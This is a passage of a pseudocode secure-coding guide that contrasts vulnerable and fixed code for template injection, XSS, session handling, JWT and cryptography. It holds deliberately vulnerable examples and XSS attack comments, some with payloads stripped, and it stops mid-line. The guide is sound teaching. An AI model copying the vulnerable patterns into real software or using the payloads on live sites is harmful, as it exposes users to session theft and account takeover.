+ +FUNCTION render_email_safe(template_name, user_data): + // Safe: Only allow pre-defined templates + allowed_templates = ["welcome", "reset_password", "notification"] + + IF template_name NOT IN allowed_templates: + THROW Error("Invalid template name") + END IF + + // Sanitize all user data + safe_data = {} + FOR key, value IN user_data: + safe_data[key] = escape_html(string(value)) + END FOR + + template = template_engine.load(template_name + ".html") + RETURN template.render(safe_data) +END FUNCTION + +// For user-customizable content, use a safe subset +FUNCTION render_user_content(content): + // Use a sandboxed/logic-less template engine + // or plain text with variable substitution only + allowed_vars = ["name", "date", "product"] + + result = content + FOR var_name IN allowed_vars: + placeholder = "{{" + var_name + "}}" + IF var_name IN context: + result = result.replace(placeholder, escape_html(context[var_name])) + END IF + END FOR + + // Remove any remaining template syntax + result = regex.replace(result, "\{\{.*?\}\}", "") + + RETURN result +END FUNCTION +``` + +--- + +## 3. Cross-Site Scripting (XSS) + +**CWE References:** CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Improper Neutralization of Script-Related HTML Tags) +**Severity:** Critical | **Related:** [[XSS-Vulnerabilities]] + +> **Risk:** XSS has the **highest failure rate (86%)** in AI-generated code. AI models are 2.74x more likely to produce XSS-vulnerable code than human developers. XSS enables session hijacking, account takeover, and data theft. AI frequently generates direct string concatenation into HTML without encoding. + +### 3.1 Reflected XSS (Echoing User Input) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: User input directly echoed in response +// ======================================== +FUNCTION handle_search(request): + query = request.get_parameter("q") + + // Vulnerable: User input inserted directly into HTML + html = "

Search results for: " + query + "

" + html += "

No results found.

" + RETURN html_response(html) +END FUNCTION + +FUNCTION display_error(error_message): + // Vulnerable: Error parameter reflected without encoding + RETURN "
" + error_message + "
" +END FUNCTION + +// Attack: /search?q= +// Result: Script executes in victim's browser, stealing their session + +// ======================================== +// GOOD: HTML-encode all user input before rendering +// ======================================== +FUNCTION handle_search(request): + query = request.get_parameter("q") + + // Safe: HTML-encode user input + safe_query = html_encode(query) + + html = "

Search results for: " + safe_query + "

" + html += "

No results found.

" + RETURN html_response(html) +END FUNCTION + +FUNCTION display_error(error_message): + // Safe: Encode before inserting into HTML + RETURN "
" + html_encode(error_message) + "
" +END FUNCTION + +// HTML encoding function +FUNCTION html_encode(input): + result = input + result = result.replace("&", "&") + result = result.replace("<", "<") + result = result.replace(">", ">") + result = result.replace('"', """) + result = result.replace("'", "'") + RETURN result +END FUNCTION +``` + +### 3.2 Stored XSS (Database to Page Without Encoding) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Stored data rendered without encoding +// ======================================== +FUNCTION display_comments(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + html = "
" + FOR comment IN comments: + // Vulnerable: Stored data rendered directly + html += "
" + html += "" + comment.author + "" + html += "

" + comment.text + "

" + html += "
" + END FOR + html += "
" + RETURN html +END FUNCTION + +FUNCTION display_user_profile(user_id): + user = database.get_user(user_id) + + // Vulnerable: User-controlled fields rendered directly + html = "

" + user.display_name + "

" + html += "
" + user.biography + "
" + RETURN html +END FUNCTION + +// Attack: Attacker saves comment with text: +// Result: Every user viewing the page executes attacker's script + +// ======================================== +// GOOD: Encode all database-sourced content +// ======================================== +FUNCTION display_comments(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + html = "
" + FOR comment IN comments: + // Safe: All stored data is encoded + html += "
" + html += "" + html_encode(comment.author) + "" + html += "

" + html_encode(comment.text) + "

" + html += "
" + END FOR + html += "
" + RETURN html +END FUNCTION + +FUNCTION display_user_profile(user_id): + user = database.get_user(user_id) + + // Safe: Encode user-controlled fields + html = "

" + html_encode(user.display_name) + "

" + html += "
" + html_encode(user.biography) + "
" + RETURN html +END FUNCTION + +// Better: Use templating engine with auto-escaping +FUNCTION display_comments_template(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + // Templating engines like Jinja2, Handlebars auto-escape by default + RETURN template.render("comments.html", {comments: comments}) +END FUNCTION +``` + +### 3.3 DOM-Based XSS (innerHTML, document.write) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Dangerous DOM manipulation methods +// ======================================== +FUNCTION display_welcome_message(): + // Vulnerable: URL parameter into innerHTML + params = parse_url_parameters(window.location.search) + username = params.get("name") + + document.getElementById("welcome").innerHTML = + "Welcome, " + username + "!" +END FUNCTION + +FUNCTION update_content(user_content): + // Vulnerable: User content via innerHTML + document.getElementById("content").innerHTML = user_content +END FUNCTION + +FUNCTION load_dynamic_script(url): + // Dangerous: document.write with external content + document.write("") +END FUNCTION + +// Attack: ?name= +// Result: XSS via event handler, bypasses simple " + html += "" + + // Attacker-injected scripts without nonce will be blocked + RETURN html +END FUNCTION + +// CSP report-only mode for testing +FUNCTION configure_csp_reporting(): + server.set_header("Content-Security-Policy-Report-Only", + "default-src 'self'; report-uri /csp-report" + ) +END FUNCTION +``` + +### 3.5 Improper Output Encoding (Context-Specific) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Wrong encoding for context +// ======================================== +FUNCTION render_javascript_variable(user_input): + // Vulnerable: HTML encoding doesn't protect JavaScript context + safe_for_html = html_encode(user_input) + + script = "" + RETURN script +END FUNCTION + +FUNCTION render_url_parameter(user_input): + // Vulnerable: No URL encoding + url = "https://example.com/page?data=" + user_input + RETURN "Link" +END FUNCTION + +FUNCTION render_css_value(user_color): + // Vulnerable: No CSS encoding + style = "
Text
" + RETURN style +END FUNCTION + +// Attack on JS context: User input = "'; alert(1); //'" +// Result: var userData = ''; alert(1); //''; - Script injection + +// ======================================== +// GOOD: Context-specific encoding +// ======================================== + +// JavaScript string context +FUNCTION js_encode(input): + result = input + result = result.replace("\\", "\\\\") + result = result.replace("'", "\\'") + result = result.replace('"', '\\"') + result = result.replace("\n", "\\n") + result = result.replace("\r", "\\r") + result = result.replace("<", "\\x3c") // Prevent breakout + result = result.replace(">", "\\x3e") + RETURN result +END FUNCTION + +FUNCTION render_javascript_variable(user_input): + // Safe: Proper JavaScript encoding + safe_for_js = js_encode(user_input) + + script = "" + RETURN script +END FUNCTION + +// Better: Use JSON encoding for complex data +FUNCTION render_javascript_data(user_data): + // Safest: JSON encoding handles all edge cases + json_data = json_encode(user_data) + + script = "" + RETURN script +END FUNCTION + +// URL context +FUNCTION render_url_parameter(user_input): + // Safe: URL encoding + encoded_param = url_encode(user_input) + url = "https://example.com/page?data=" + encoded_param + + // Also HTML-encode the entire URL for the href attribute + RETURN "Link" +END FUNCTION + +// CSS context +FUNCTION css_encode(input): + // Only allow safe CSS values + allowed_pattern = "^[a-zA-Z0-9#]+$" + IF NOT regex.match(allowed_pattern, input): + RETURN "inherit" // Safe default + END IF + RETURN input +END FUNCTION + +FUNCTION render_css_value(user_color): + // Safe: Validate and encode CSS value + safe_color = css_encode(user_color) + style = "
Text
" + RETURN style +END FUNCTION + +// HTML attribute context +FUNCTION render_attribute(attr_name, user_value): + // HTML-encode and quote attribute value + safe_value = html_encode(user_value) + RETURN attr_name + '="' + safe_value + '"' +END FUNCTION +``` + +--- + +## 4. Authentication and Session Management + +**CWE References:** CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-521 (Weak Password Requirements), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-613 (Insufficient Session Expiration) +**Severity:** Critical | **Related:** [[Authentication-Failures]] + +> **Risk:** Authentication failures are a leading cause of data breaches. AI-generated code often implements weak password policies, insecure session handling, and vulnerable JWT patterns learned from outdated tutorials. Proper authentication requires defense in depth: strong credentials, secure sessions, rate limiting, and multi-factor authentication. + +### 4.1 Weak Password Requirements + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No or weak password validation +// ======================================== +FUNCTION register_user(username, password): + // Vulnerable: No password strength requirements + IF password.length < 4: + THROW Error("Password too short") + END IF + + // No checks for complexity, common passwords, or breaches + hash = simple_hash(password) // Often MD5 or SHA1 + database.insert("users", {username: username, password_hash: hash}) +END FUNCTION + +FUNCTION validate_password_weak(password): + // Vulnerable: Only checks length + RETURN password.length >= 6 +END FUNCTION + +// Problems: +// - Allows "123456", "password", "qwerty" +// - No complexity requirements +// - No check against breached password lists + +// ======================================== +// GOOD: Strong password policy with multiple checks +// ======================================== +FUNCTION register_user(username, password): + validation_result = validate_password_strength(password) + + IF NOT validation_result.is_valid: + THROW Error(validation_result.message) + END IF + + // Use strong hashing algorithm with salt + hash = bcrypt.hash(password, rounds=12) + database.insert("users", {username: username, password_hash: hash}) +END FUNCTION + +FUNCTION validate_password_strength(password): + errors = [] + + // Minimum length (NIST recommends 8+, many use 12+) + IF password.length < 12: + errors.append("Password must be at least 12 characters") + END IF + + // Maximum length (prevent DoS via very long passwords) + IF password.length > 128: + errors.append("Password must not exceed 128 characters") + END IF + + // Check character diversity + has_upper = regex.search("[A-Z]", password) + has_lower = regex.search("[a-z]", password) + has_digit = regex.search("[0-9]", password) + has_special = regex.search("[!@#$%^&*(),.?\":{}|<>]", password) + + IF NOT (has_upper AND has_lower AND has_digit): + errors.append("Password must contain uppercase, lowercase, and numbers") + END IF + + // Check against common passwords list + IF is_common_password(password): + errors.append("Password is too common, choose a unique password") + END IF + + // Check against breached passwords (via k-Anonymity API) + IF is_breached_password(password): + errors.append("Password found in data breach, choose another") + END IF + + // Check for username in password + IF password.lower().contains(username.lower()): + errors.append("Password cannot contain username") + END IF + + RETURN { + is_valid: errors.length == 0, + message: errors.join("; ") + } +END FUNCTION + +// Check breached passwords using k-Anonymity (e.g., HaveIBeenPwned API) +FUNCTION is_breached_password(password): + hash = sha1(password).upper() + prefix = hash.substring(0, 5) + suffix = hash.substring(5) + + // Only send hash prefix to API (privacy-preserving) + response = http.get("https://api.pwnedpasswords.com/range/" + prefix) + hashes = parse_pwned_response(response) + + RETURN suffix IN hashes +END FUNCTION +``` + +### 4.2 Missing Rate Limiting on Auth Endpoints + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No rate limiting on authentication +// ======================================== +FUNCTION login(username, password): + // Vulnerable: No limit on login attempts + user = database.find_user(username) + + IF user IS NULL: + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + IF bcrypt.verify(password, user.password_hash): + RETURN {success: TRUE, token: generate_token(user)} + ELSE: + RETURN {success: FALSE, error: "Invalid credentials"} + END IF +END FUNCTION + +// Problems: +// - Allows unlimited password guessing (brute force) +// - Allows credential stuffing attacks +// - No account lockout protection + +// ======================================== +// GOOD: Rate limiting with progressive delays +// ======================================== +FUNCTION login(username, password): + client_ip = request.get_client_ip() + + // Check IP-based rate limit (protects against distributed attacks) + IF is_ip_rate_limited(client_ip): + log.warning("Rate limited IP attempted login", {ip: client_ip}) + RETURN {success: FALSE, error: "Too many attempts, try again later"} + END IF + + // Check account-based rate limit (protects specific accounts) + IF is_account_rate_limited(username): + log.warning("Rate limited account attempted login", {username: username}) + RETURN {success: FALSE, error: "Account temporarily locked"} + END IF + + user = database.find_user(username) + + // Use constant-time comparison to prevent timing attacks + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + record_failed_attempt(username, client_ip) + // Generic error message (don't reveal if user exists) + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Successful login - reset counters + clear_failed_attempts(username, client_ip) + + RETURN {success: TRUE, token: generate_token(user)} +END FUNCTION + +// IP-based rate limiting +FUNCTION is_ip_rate_limited(ip): + key = "login_attempts:ip:" + ip + attempts = rate_limiter.get(key, default=0) + + // Allow 10 attempts per 15 minutes per IP + RETURN attempts >= 10 +END FUNCTION + +// Account-based rate limiting with progressive lockout +FUNCTION is_account_rate_limited(username): + key = "login_attempts:user:" + username + attempts = rate_limiter.get(key, default=0) + + // Progressive lockout: + // 5 attempts: 1 minute lockout + // 10 attempts: 5 minute lockout + // 15 attempts: 15 minute lockout + // 20+ attempts: 1 hour lockout + + IF attempts >= 20: + lockout_time = 3600 // 1 hour + ELSE IF attempts >= 15: + lockout_time = 900 // 15 minutes + ELSE IF attempts >= 10: + lockout_time = 300 // 5 minutes + ELSE IF attempts >= 5: + lockout_time = 60 // 1 minute + ELSE: + RETURN FALSE + END IF + + last_attempt = rate_limiter.get_timestamp(key) + RETURN (current_time() - last_attempt) < lockout_time +END FUNCTION + +FUNCTION record_failed_attempt(username, ip): + // Increment both counters with TTL + rate_limiter.increment("login_attempts:ip:" + ip, ttl=900) + rate_limiter.increment("login_attempts:user:" + username, ttl=3600) + + // Alert on suspicious patterns + ip_attempts = rate_limiter.get("login_attempts:ip:" + ip) + IF ip_attempts >= 50: + security_alert("Possible brute force attack from IP: " + ip) + END IF +END FUNCTION +``` + +### 4.3 Insecure Session Token Generation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable session tokens +// ======================================== +FUNCTION create_session_weak(user_id): + // Vulnerable: Predictable token based on user ID + token = "session_" + user_id + "_" + current_timestamp() + RETURN token +END FUNCTION + +FUNCTION create_session_sequential(): + // Vulnerable: Sequential/incremental tokens + GLOBAL session_counter + session_counter = session_counter + 1 + RETURN "session_" + session_counter +END FUNCTION + +FUNCTION create_session_weak_random(): + // Vulnerable: Using Math.random() or similar weak PRNG + token = "" + FOR i = 1 TO 32: + token = token + random_char() // Math.random() based + END FOR + RETURN token +END FUNCTION + +// Attack: Attacker can predict/enumerate session tokens +// - Timestamp-based: Try tokens from recent timestamps +// - Sequential: Try nearby session IDs +// - Weak random: Seed prediction or insufficient entropy + +// ======================================== +// GOOD: Cryptographically secure session tokens +// ======================================== +FUNCTION create_session(user_id): + // Generate cryptographically secure random token + // Use 256 bits (32 bytes) minimum for security + token_bytes = crypto.secure_random_bytes(32) + token = base64_url_encode(token_bytes) // URL-safe encoding + + // Store session with metadata + session_data = { + user_id: user_id, + created_at: current_timestamp(), + expires_at: current_timestamp() + SESSION_LIFETIME, + ip_address: request.get_client_ip(), + user_agent: request.get_user_agent() + } + + // Store hashed token (protect against database leaks) + token_hash = sha256(token) + session_store.set(token_hash, session_data) + + RETURN token +END FUNCTION + +FUNCTION validate_session(token): + IF token IS NULL OR token.length < 32: + RETURN NULL + END IF + + token_hash = sha256(token) + session = session_store.get(token_hash) + + IF session IS NULL: + RETURN NULL + END IF + + // Check expiration + IF current_timestamp() > session.expires_at: + session_store.delete(token_hash) + RETURN NULL + END IF + + // Optional: Validate IP/User-Agent consistency + IF session.ip_address != request.get_client_ip(): + log.warning("Session IP mismatch", { + expected: session.ip_address, + actual: request.get_client_ip() + }) + // Decide whether to invalidate or just log + END IF + + RETURN session +END FUNCTION + +// Secure cookie configuration +FUNCTION set_session_cookie(response, token): + response.set_cookie("session", token, { + httponly: TRUE, // Prevent JavaScript access + secure: TRUE, // HTTPS only + samesite: "Strict", // Prevent CSRF + max_age: SESSION_LIFETIME, + path: "/" + }) +END FUNCTION +``` + +### 4.4 Session Fixation Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Session ID not regenerated on login +// ======================================== +FUNCTION login_vulnerable(username, password): + // Session ID was set when user first visited (before login) + session_id = request.get_cookie("session_id") + + user = authenticate(username, password) + IF user IS NULL: + RETURN {success: FALSE} + END IF + + // Vulnerable: Reusing pre-authentication session ID + session_store.set(session_id, {user_id: user.id, authenticated: TRUE}) + RETURN {success: TRUE} +END FUNCTION + +// Attack scenario: +// 1. Attacker visits site, gets session_id=ABC123 +// 2. Attacker sends victim link: https://site.com?session_id=ABC123 +// 3. Victim logs in with attacker's session ID +// 4. Attacker uses session_id=ABC123 to access victim's account + +// ======================================== +// GOOD: Regenerate session on authentication changes +// ======================================== +FUNCTION login_secure(username, password): + user = authenticate(username, password) + IF user IS NULL: + RETURN {success: FALSE} + END IF + + // CRITICAL: Invalidate old session and create new one + old_session_id = request.get_cookie("session_id") + IF old_session_id IS NOT NULL: + session_store.delete(old_session_id) + END IF + + // Generate completely new session ID + new_session = create_session(user.id) + + // Set new session cookie + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN {success: TRUE} +END FUNCTION + +// Also regenerate session on privilege escalation +FUNCTION elevate_privileges(user, new_role): + // Invalidate current session + old_session_id = request.get_cookie("session_id") + session_store.delete(old_session_id) + + // Create new session with elevated privileges + new_session = create_session(user.id) + new_session.role = new_role + + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN new_session +END FUNCTION + +// Regenerate session periodically for long-lived sessions +FUNCTION check_session_rotation(session): + // Rotate session every 15 minutes for active users + IF current_timestamp() - session.created_at > 900: + new_session = create_session(session.user_id) + new_session.data = session.data // Preserve session data + + session_store.delete(session.id) + + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN new_session + END IF + + RETURN session +END FUNCTION +``` + +### 4.5 JWT Misuse (None Algorithm, Weak Secrets, Sensitive Data) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Common JWT security mistakes +// ======================================== + +// Mistake 1: Not verifying algorithm (none algorithm attack) +FUNCTION verify_jwt_vulnerable(token): + // Vulnerable: Accepts whatever algorithm is in the header + decoded = jwt.decode(token, SECRET_KEY) // Attacker sets alg: "none" + RETURN decoded +END FUNCTION + +// Mistake 2: Weak or short secret key +CONSTANT JWT_SECRET = "secret123" // Easily brute-forced + +FUNCTION create_jwt_weak(user_id): + payload = {user_id: user_id, exp: current_time() + 86400} + RETURN jwt.encode(payload, JWT_SECRET, algorithm="HS256") +END FUNCTION + +// Mistake 3: Sensitive data in payload (JWTs are base64, not encrypted!) +FUNCTION create_jwt_exposed(user): + payload = { + user_id: user.id, + email: user.email, + ssn: user.social_security_number, // PII in token! + credit_card: user.card_number, // Sensitive data exposed! + password_hash: user.password_hash, // Never put this in JWT! + exp: current_time() + 86400 + } + RETURN jwt.encode(payload, SECRET_KEY) +END FUNCTION + +// Mistake 4: No expiration or very long expiration +FUNCTION create_jwt_no_expiry(user_id): + payload = {user_id: user_id} // No exp claim! + RETURN jwt.encode(payload, SECRET_KEY) +END FUNCTION + +// ======================================== +// GOOD: Secure JWT implementation +// ======================================== + +// Use a strong secret (256+ bits for HS256) +CONSTANT JWT_SECRET = environment.get("JWT_SECRET") // From secret manager + +FUNCTION initialize_jwt(): + // Validate secret strength at startup + IF JWT_SECRET IS NULL OR JWT_SECRET.length < 32: + THROW Error("JWT_SECRET must be at least 256 bits") + END IF +END FUNCTION + +FUNCTION create_jwt_secure(user_id): + now = current_time() + + payload = { + // Standard claims + sub: user_id, // Subject + iat: now, // Issued at + exp: now + 3600, // Expiration (1 hour max for access tokens) + nbf: now, // Not before + + // Custom claims (non-sensitive only!) + role: user.role // Roles are OK + // Never include: passwords, PII, payment info + } + + // Explicitly specify algorithm + RETURN jwt.encode(payload, JWT_SECRET, algorithm="HS256") +END FUNCTION + +FUNCTION verify_jwt_secure(token): + TRY: + // CRITICAL: Explicitly specify allowed algorithms + decoded = jwt.decode(token, JWT_SECRET, algorithms=["HS256"]) + + // Additional validation + IF decoded.exp < current_time(): + THROW Error("Token expired") + END IF + + IF decoded.nbf > current_time(): + THROW Error("Token not yet valid") + END IF + + RETURN decoded + + CATCH JWTError as e: + log.warning("JWT verification failed", {error: e.message}) + RETURN NULL + END TRY +END FUNCTION + +// For sensitive applications, use asymmetric keys (RS256) +FUNCTION create_jwt_asymmetric(user_id): + private_key = load_private_key("jwt_private.pem") + + payload = { + sub: user_id, + iat: current_time(), + exp: current_time() + 3600 + } + + // Sign with private key + RETURN jwt.encode(payload, private_key, algorithm="RS256") +END FUNCTION + +FUNCTION verify_jwt_asymmetric(token): + public_key = load_public_key("jwt_public.pem") + + // Verify with public key (can be shared safely) + RETURN jwt.decode(token, public_key, algorithms=["RS256"]) +END FUNCTION + +// Implement refresh token pattern for long-lived sessions +FUNCTION create_token_pair(user_id): + // Short-lived access token (15 minutes) + access_token = create_jwt_secure(user_id, expiry=900) + + // Long-lived refresh token (7 days) - store in DB for revocation + refresh_token = crypto.secure_random_bytes(32).to_base64() + database.insert("refresh_tokens", { + token_hash: sha256(refresh_token), + user_id: user_id, + expires_at: current_time() + 604800 + }) + + RETURN { + access_token: access_token, + refresh_token: refresh_token + } +END FUNCTION +``` + +### 4.6 Missing MFA Considerations + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Single-factor authentication only +// ======================================== +FUNCTION login_single_factor(username, password): + user = database.find_user(username) + + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Immediately grant full access after password verification + token = create_session(user.id) + RETURN {success: TRUE, token: token} +END FUNCTION + +// Problems: +// - Compromised password = full account takeover +// - No protection against credential stuffing +// - Phishing attacks succeed completely +// - No step-up authentication for sensitive operations + +// ======================================== +// GOOD: MFA-aware authentication flow +// ======================================== +FUNCTION login_with_mfa(username, password): + user = database.find_user(username) + + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Check if MFA is enabled + IF user.mfa_enabled: + // Create partial session (not fully authenticated) + partial_token = create_partial_session(user.id) + + RETURN { + success: FALSE, + mfa_required: TRUE, + partial_token: partial_token, + mfa_methods: get_user_mfa_methods(user.id) + } + END IF + + // If MFA not enabled, encourage setup + token = create_session(user.id) + RETURN { + success: TRUE, + token: token, + mfa_suggestion: user.is_admin // Strongly suggest MFA for admins + } +END FUNCTION + +FUNCTION verify_mfa(partial_token, mfa_code, mfa_method): + session = get_partial_session(partial_token) + + IF session IS NULL OR session.expires_at < current_time(): + RETURN {success: FALSE, error: "Session expired, please login again"} + END IF + + user = database.get_user(session.user_id) + + // Verify MFA code based on method + is_valid = FALSE + + IF mfa_method == "totp": + is_valid = verify_totp(user.totp_secret, mfa_code) + ELSE IF mfa_method == "sms": + is_valid = verify_sms_code(user.id, mfa_code) + ELSE IF mfa_method == "backup": + is_valid = verify_backup_code(user.id, mfa_code) + END IF + + IF NOT is_valid: + record_failed_mfa_attempt(user.id) + RETURN {success: FALSE, error: "Invalid verification code"} + END IF + + // MFA verified - create full session + delete_partial_session(partial_token) + token = create_session(user.id) + + RETURN {success: TRUE, token: token} +END FUNCTION + +// TOTP verification with time window +FUNCTION verify_totp(secret, code): + // Allow 1 step before and after for clock drift (30 second windows) + FOR step IN [-1, 0, 1]: + expected = generate_totp(secret, time_step=step) + IF constant_time_compare(code, expected): + RETURN TRUE + END IF + END FOR + RETURN FALSE +END FUNCTION + +// Step-up authentication for sensitive operations +FUNCTION require_recent_auth(user_session, max_age_seconds): + IF current_time() - user_session.authenticated_at > max_age_seconds: + RETURN { + requires_reauth: TRUE, + message: "Please re-enter your password for this action" + } + END IF + RETURN {requires_reauth: FALSE} +END FUNCTION + +FUNCTION perform_sensitive_action(session, action, password): + // Require recent password entry for sensitive actions + user = database.get_user(session.user_id) + + IF NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid password"} + END IF + + // Update authentication timestamp + session.authenticated_at = current_time() + + // Perform the sensitive action + RETURN execute_action(action) +END FUNCTION +``` + +### 4.7 Insecure Password Reset Flows + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Insecure password reset implementations +// ======================================== + +// Mistake 1: Predictable reset tokens +FUNCTION create_reset_token_weak(user_id): + // Vulnerable: MD5 of user_id + timestamp is guessable + token = md5(user_id + current_timestamp()) + database.save_reset_token(user_id, token) + RETURN token +END FUNCTION + +// Mistake 2: Token never expires +FUNCTION request_password_reset_no_expiry(email): + user = database.find_user_by_email(email) + token = generate_token() + // Vulnerable: No expiration set + database.save_reset_token(user.id, token) + send_email(email, "Reset: " + BASE_URL + "/reset?token=" + token) +END FUNCTION + +// Mistake 3: Token not invalidated after use +FUNCTION reset_password_reusable(token, new_password): + user_id = database.get_user_by_reset_token(token) + user = database.get_user(user_id) + user.password_hash = hash(new_password) + database.save(user) + // Vulnerable: Token still valid, can be reused! +END FUNCTION + +// Mistake 4: User enumeration via different responses +FUNCTION request_reset_enumeration(email): + user = database.find_user_by_email(email) + IF user IS NULL: + RETURN {error: "No account found with this email"} // Reveals info! + END IF + // ... send reset email + RETURN {success: TRUE, message: "Reset email sent"} +END FUNCTION + +// Mistake 5: Sending password in email +FUNCTION reset_password_insecure(email): + user = database.find_user_by_email(email) + new_password = generate_random_password() + user.password_hash = hash(new_password) + // Vulnerable: Password in plaintext email + send_email(email, "Your new password is: " + new_password) +END FUNCTION + +// ======================================== +// GOOD: Secure password reset flow +// ======================================== +FUNCTION request_password_reset(email): + // Always return same response to prevent enumeration + user = database.find_user_by_email(email) + + IF user IS NOT NULL: + // Invalidate any existing reset tokens + database.delete_reset_tokens(user.id) + + // Generate cryptographically secure token + token_bytes = crypto.secure_random_bytes(32) + token = base64_url_encode(token_bytes) + + // Store hashed token with expiration + token_hash = sha256(token) + database.save_reset_token({ + user_id: user.id, + token_hash: token_hash, + expires_at: current_time() + 3600, // 1 hour expiration + created_at: current_time() + }) + + // Send reset email + reset_url = BASE_URL + "/reset-password?token=" + token + send_email(user.email, "password_reset", {reset_url: reset_url}) + + log.info("Password reset requested", {user_id: user.id}) + END IF + + // Same response whether user exists or not + RETURN { + success: TRUE, + message: "If an account exists, a reset email has been sent" + } +END FUNCTION + +FUNCTION validate_reset_token(token): + IF token IS NULL OR token.length < 32: + RETURN NULL + END IF + + token_hash = sha256(token) + reset_record = database.find_reset_token(token_hash) + + IF reset_record IS NULL: + log.warning("Invalid reset token attempted") + RETURN NULL + END IF + + // Check expiration + IF current_time() > reset_record.expires_at: + database.delete_reset_token(token_hash) + RETURN NULL + END IF + + RETURN reset_record +END FUNCTION + +FUNCTION reset_password(token, new_password): + reset_record = validate_reset_token(token) + + IF reset_record IS NULL: + RETURN {success: FALSE, error: "Invalid or expired reset link"} + END IF + + // Validate new password strength + validation = validate_password_strength(new_password) + IF NOT validation.is_valid: + RETURN {success: FALSE, error: validation.message} + END IF + + user = database.get_user(reset_record.user_id) + + // Check if new password is same as old + IF bcrypt.verify(new_password, user.password_hash): + RETURN {success: FALSE, error: "New password must be different"} + END IF + + // Update password + user.password_hash = bcrypt.hash(new_password, rounds=12) + database.save(user) + + // CRITICAL: Invalidate the reset token + database.delete_reset_token(sha256(token)) + + // Invalidate all existing sessions (force re-login) + session_store.delete_all_user_sessions(user.id) + + // Send confirmation email + send_email(user.email, "password_changed", { + timestamp: current_time(), + ip_address: request.get_client_ip() + }) + + log.info("Password reset completed", {user_id: user.id}) + + RETURN {success: TRUE, message: "Password reset successfully"} +END FUNCTION + +// Additional security: Limit reset requests +FUNCTION rate_limit_reset_requests(email): + key = "password_reset:" + sha256(email) + attempts = rate_limiter.get(key, default=0) + + IF attempts >= 3: + // Max 3 reset requests per hour + RETURN FALSE + END IF + + rate_limiter.increment(key, ttl=3600) + RETURN TRUE +END FUNCTION +``` + +--- + +## 5. Cryptographic Failures + +**CWE References:** CWE-327 (Use of Broken or Risky Cryptographic Algorithm), CWE-328 (Reversible One-Way Hash), CWE-330 (Use of Insufficiently Random Values), CWE-326 (Inadequate Encryption Strength), CWE-759 (Use of One-Way Hash without a Salt) +**Severity:** High to Critical | **Related:** [[Cryptographic-Misuse]] + +> **Risk:** AI models frequently suggest outdated or weak cryptographic algorithms (MD5, SHA-1, DES) learned from decades of legacy code in training data. Cryptographic failures lead to data exposure, password compromise, and authentication bypass. A 14% failure rate for CWE-327 was documented in AI-generated code, with "significant increase" in encryption vulnerabilities when using AI assistants. + +### 5.1 Using Deprecated Algorithms (MD5, SHA1 for Security, DES) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Deprecated hash algorithms for security +// ======================================== +FUNCTION hash_password_weak(password): + // Vulnerable: MD5 is cryptographically broken + RETURN md5(password) +END FUNCTION + +FUNCTION verify_integrity_weak(data): + // Vulnerable: SHA-1 has known collision attacks + RETURN sha1(data) +END FUNCTION + +FUNCTION encrypt_data_weak(plaintext, key): + // Vulnerable: DES uses 56-bit keys (trivially breakable) + cipher = DES.new(key, mode=ECB) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +// Problems: +// - MD5: Collisions found in seconds, rainbow tables widely available +// - SHA-1: Collision attacks demonstrated (SHAttered, 2017) +// - DES: Brute-forceable in hours with modern hardware + +// ======================================== +// GOOD: Modern cryptographic algorithms +// ======================================== +FUNCTION hash_password_secure(password): + // Use bcrypt, Argon2, or scrypt for passwords + salt = bcrypt.generate_salt(rounds=12) + RETURN bcrypt.hash(password, salt) +END FUNCTION + +FUNCTION verify_integrity_secure(data): + // Use SHA-256, SHA-3, or BLAKE2 for integrity + RETURN sha256(data) +END FUNCTION + +FUNCTION encrypt_data_secure(plaintext, key): + // Use AES-256-GCM or ChaCha20-Poly1305 + nonce = crypto.secure_random_bytes(12) + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + RETURN nonce + tag + ciphertext // Include nonce and auth tag +END FUNCTION + +// Algorithm selection guide: +// - Password hashing: bcrypt, Argon2id, scrypt (NOT SHA-256 alone) +// - Symmetric encryption: AES-256-GCM, ChaCha20-Poly1305 +// - Integrity/checksums: SHA-256, SHA-3, BLAKE2 +// - Signatures: Ed25519, ECDSA with P-256, RSA-2048+ +``` + +### 5.2 Hardcoded Encryption Keys + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Hardcoded encryption keys in source +// ======================================== +CONSTANT ENCRYPTION_KEY = "MySecretKey12345" // Committed to repo! +CONSTANT AES_KEY = bytes([0x2b, 0x7e, 0x15, 0x16, ...]) // Still hardcoded + +FUNCTION encrypt_user_data(data): + cipher = 